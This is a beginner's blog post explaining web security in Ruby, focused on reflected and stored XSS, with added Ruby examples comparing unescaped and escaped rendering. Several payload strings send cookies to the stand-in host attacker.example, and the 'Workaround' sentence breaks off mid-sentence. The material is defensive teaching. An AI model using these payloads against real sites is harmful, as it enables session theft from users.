[RUBY] Security in web applications

Developing a web application without security measures is extremely dangerous. This post summarizes what I learned about what security is, why it is dangerous not to take measures, what actually happens when you don't, and how to take them (development in Ruby).

Premise
This is what I learned as a programming beginner (1 to 2 months in).
It may not match actual practice and may contain mistakes.
I would appreciate it if you could point out any errors or shallow parts.

Why is it dangerous without security measures?

Why are web services without security measures dangerous, and what happens? Conclusion: users' personal information leaks, and the web page is tampered with without the administrator's permission.

Looking a little closer:
・ Personal information can be viewed without authorization
・ The contents of the web page are tampered with
・ As a result, the web page itself becomes unavailable
・ Serious damage to the users of the web service
・ Loss of social credibility for the published site

What is security in web services?

Security in a web service is the degree to which it is free of exploitable vulnerabilities; a web service with vulnerabilities is an insecure one.

Vulnerability

A vulnerability, also called a security hole, is a defect in software, or a problem in how it is used, that a malicious person can exploit to attack the system. It is the weak point an attack is aimed at, and it causes damage to both developers and users.

Types of security attacks

・ Attacks using JavaScript (cross-site scripting)
・ Attacks using sessions (for example, session hijacking)
・ Attacks that send forged requests (cross-site request forgery, CSRF)
・ SQL attacks (SQL injection)
For the rest of this post, think of an attack as an act of stealing personal information, although tampering and taking the service down are also possible outcomes.

JavaScript attack

JavaScript is a client-side programming language: it runs in the user's browser. If an attacker manages to embed malicious JavaScript in a page of the web application, that code runs in the browser of every user who views the page, with that user's privileges on the site. This kind of attack is called XSS (Cross-Site Scripting).

XSS (Cross-Site Scripting)

A technique in which an attacker embeds a malicious JavaScript program (script) in a vulnerable web application and uses it to attack the users of that site. The goal of XSS is to get the script to execute when the page is displayed; embedding and running the script is the "scripting" part of the name. A typical payload sends the user's personal information, most often the session cookie, to a server controlled by the attacker.

XSS attack pattern

There are two patterns of XSS covered here: reflected XSS and stored (persistent) XSS. (A third, DOM-based XSS, in which client-side code rather than the server inserts the script into the page, is not covered in this post.)

Reflected XSS

A technique in which the script runs on a vulnerable web application when the user clicks a malicious URL.

Procedure
① Get the user to click the URL. The attacker gets the user to click a crafted URL that leads to the vulnerable web application, with the script placed in a parameter of the URL. The vulnerable application is usually a legitimate, unrelated site: the attacker only needs it to echo the parameter back into the page, and borrows the site's name to make the link look trustworthy.
② When the user clicks, the script runs on the vulnerable web application. The application copies the parameter into its response without escaping it, so the browser treats the script as part of the page and runs it as soon as the page opens.
③ When the script runs, personal information is sent to the attacker's server. The script reads data such as the session cookie and sends it to a server the attacker controls, where it is recorded.

It is called the reflected type because the script in the request is reflected straight back in the response and executes immediately. The user arrives from another site (or an email or chat message) and the script runs on the vulnerable application; that is the "cross-site" in cross-site scripting. It is also one reason chat apps show a confirmation such as "you are about to open an external site" before following a posted link.
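The three steps above, as an added example that is not code from the original post: a search page that echoes its "q" parameter, the crafted URL that carries the script, the response the vulnerable handler would send, and the same response after escaping. The hosts vulnerable.example and attacker.example and the handler names are hypothetical; no server is started, the functions just build the HTML the server would return.

```ruby
require "erb"
require "uri"

# Constructed example, not code from the original post: a search page that
# echoes the "q" query parameter into its HTML. No server is started; the
# functions build the exact response the server would return. The hosts
# "vulnerable.example" and "attacker.example" are hypothetical.

# Step ①: the attacker's crafted link. The script rides in the URL itself;
# nothing is stored on the server, and only the user who clicks is hit.
PAYLOAD = '<script>location="https://attacker.example/?c="+document.cookie</script>'
MALICIOUS_URL = "https://vulnerable.example/search?q=" +
                URI.encode_www_form_component(PAYLOAD)

# Parse the "q" parameter the way the application would.
def query_param(url)
  uri = URI.parse(url)
  URI.decode_www_form(uri.query.to_s).to_h["q"].to_s
end

# Step ②, vulnerable handler: the parameter is copied verbatim into the
# response, so the browser parses the payload as a real <script> element.
def render_search_vulnerable(q)
  "<h1>Results for: #{q}</h1>"
end

# Fixed handler: html_escape turns < > & " ' into entities, so the payload
# is displayed as text and never executes.
def render_search_safe(q)
  "<h1>Results for: #{ERB::Util.html_escape(q)}</h1>"
end

# Demo-only check: does the page contain a live <script> element?
def contains_script?(html)
  html.match?(/<script\b/i)
end

if $PROGRAM_NAME == __FILE__
  q = query_param(MALICIOUS_URL)
  puts "Attacker's URL: #{MALICIOUS_URL}"
  puts "Vulnerable response: #{render_search_vulnerable(q)}"
  puts "Safe response:       #{render_search_safe(q)}"
end
```

The only difference between the two handlers is the call to html_escape at the point where user input is written into the page; the payload itself is unchanged, the server just stops handing it to the browser as markup.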

Stored (persistent) XSS

An attack in which the malicious script is embedded in a post on a vulnerable web application, so the script runs whenever a user visits the page that shows the post. For example, an attacker posts a script on a Twitter-like service: the script runs the moment someone opens a page on which the post appears, even if they never intended to read that post.

Procedure
① The attacker submits a post containing the script to the vulnerable web application, typically through a normal input form.
② When a user visits the page with the post, the script runs. Because the application stores the post and renders it without escaping, the browser runs the script as soon as the page loads. The payload does not even have to be a <script> tag; an event-handler attribute on an image, for instance, fires when the user hovers the mouse over it.
③ When the script runs, personal information is sent to the attacker's server.

It is called the stored (persistent) type because the script is stored in the vulnerable web application and runs for every user who visits.
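The stored case, as an added example that is not code from the original post: an in-memory message board where one attacker post is rendered for every later visitor. It includes both payload shapes the text mentions, a <script> tag that runs on page load and an <img> with an event-handler attribute that fires on mouse-over. The post store, the author names and attacker.example are constructed for the demo.

```ruby
require "erb"

# Constructed example, not code from the original post: an in-memory
# message board. A post is stored once and rendered into the page of
# every visitor who comes afterwards, which is what makes it "stored".
POSTS = []

def create_post(author, body)
  POSTS << { author: author, body: body }
end

# Vulnerable renderer: post bodies are inserted into the page verbatim,
# so whatever the attacker stored runs in every reader's browser.
def render_board_vulnerable
  POSTS.map { |p| "<li><b>#{p[:author]}</b>: #{p[:body]}</li>" }.join("\n")
end

# Fixed renderer: escape at output time, in every place user data lands
# (the author field is user-controlled too).
def render_board_safe
  POSTS.map do |p|
    "<li><b>#{ERB::Util.html_escape(p[:author])}</b>: " \
      "#{ERB::Util.html_escape(p[:body])}</li>"
  end.join("\n")
end

# Two hypothetical stored payloads. The first runs on page load; the second
# is the "fires when you hover over the image" case: no <script> tag at
# all, just an onmouseover attribute on an <img> element.
SCRIPT_PAYLOAD = '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>'
HOVER_PAYLOAD  = '<img src="cat.png" onmouseover="location=\'https://attacker.example/c?\'+document.cookie">'

# Demo-only detector: a <script> element, or an event-handler attribute
# inside a real tag (escaped text has no "<", so it never matches).
def live_html?(html)
  html.match?(/<script\b/i) || html.match?(/<\w+[^>]*\son\w+\s*=/i)
end

# Step ①: the attacker posts; step ②: every visitor gets the same page.
def simulate
  POSTS.clear
  create_post("alice", "hello everyone")
  create_post("mallory", SCRIPT_PAYLOAD)
  create_post("mallory", HOVER_PAYLOAD)
  { vulnerable: render_board_vulnerable, safe: render_board_safe }
end

if $PROGRAM_NAME == __FILE__
  pages = simulate
  puts "Vulnerable page:\n#{pages[:vulnerable]}\n\n"
  puts "Safe page:\n#{pages[:safe]}"
end
```

Escaping happens when the page is rendered, not when the post is saved: the stored text is kept as the user typed it, and the same escape protects every place it is later displayed.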

Dealing with XSS

Many cases of XSS are still reported, and it is consistently among the most frequently reported web application vulnerabilities.

Workaround

The main reason why XSS occurs is that the script tags (
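Where the escaping has to happen in a Ruby application, as an added example that is not code from the original post: the same profile page rendered twice with Ruby's standard ERB library. Plain ERB does not escape <%= %> output, so the template must call ERB::Util.html_escape itself (Rails' ERB escapes by default, until you use raw or html_safe). The example also shows the one place where escaping alone is not enough: a URL in an href, where a "javascript:" scheme contains no HTML metacharacters at all. The template text, the safe_url helper and the sample values are hypothetical.

```ruby
require "erb"
require "uri"

# Constructed example, not code from the original post. Plain ERB inserts
# <%= %> values verbatim; nothing is escaped unless the template asks.
UNSAFE_TEMPLATE = <<~TEMPLATE
  <p>Welcome, <%= name %>!</p>
  <a href="<%= homepage %>">homepage</a>
TEMPLATE

# Every user-controlled value goes through html_escape. The URL is also
# restricted to http/https, because html_escape does nothing against
# "javascript:alert(1)" (no < > & " ' in it) and the browser would run it
# on click.
SAFE_TEMPLATE = <<~TEMPLATE
  <p>Welcome, <%= ERB::Util.html_escape(name) %>!</p>
  <a href="<%= ERB::Util.html_escape(safe_url(homepage)) %>">homepage</a>
TEMPLATE

# Hypothetical helper: allow only http(s) URLs; anything else
# (javascript:, data:, unparsable input) is replaced by "#".
def safe_url(url)
  uri = URI.parse(url.to_s)
  %w[http https].include?(uri.scheme) ? url : "#"
rescue URI::InvalidURIError
  "#"
end

def render_profile(template, name, homepage)
  ERB.new(template).result_with_hash(name: name, homepage: homepage)
end

# Constructed attacker-supplied profile values.
NAME_PAYLOAD = "<script>alert(document.cookie)</script>"
URL_PAYLOAD  = "javascript:alert(document.cookie)"

def demo
  {
    unsafe: render_profile(UNSAFE_TEMPLATE, NAME_PAYLOAD, URL_PAYLOAD),
    safe:   render_profile(SAFE_TEMPLATE, NAME_PAYLOAD, URL_PAYLOAD),
  }
end

if $PROGRAM_NAME == __FILE__
  out = demo
  puts "Unsafe:\n#{out[:unsafe]}"
  puts "Safe:\n#{out[:safe]}"
end
```

The rule this illustrates is escape on output, for the context the value lands in: html_escape for text and attribute values, plus a scheme check for anything that ends up in a URL attribute.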
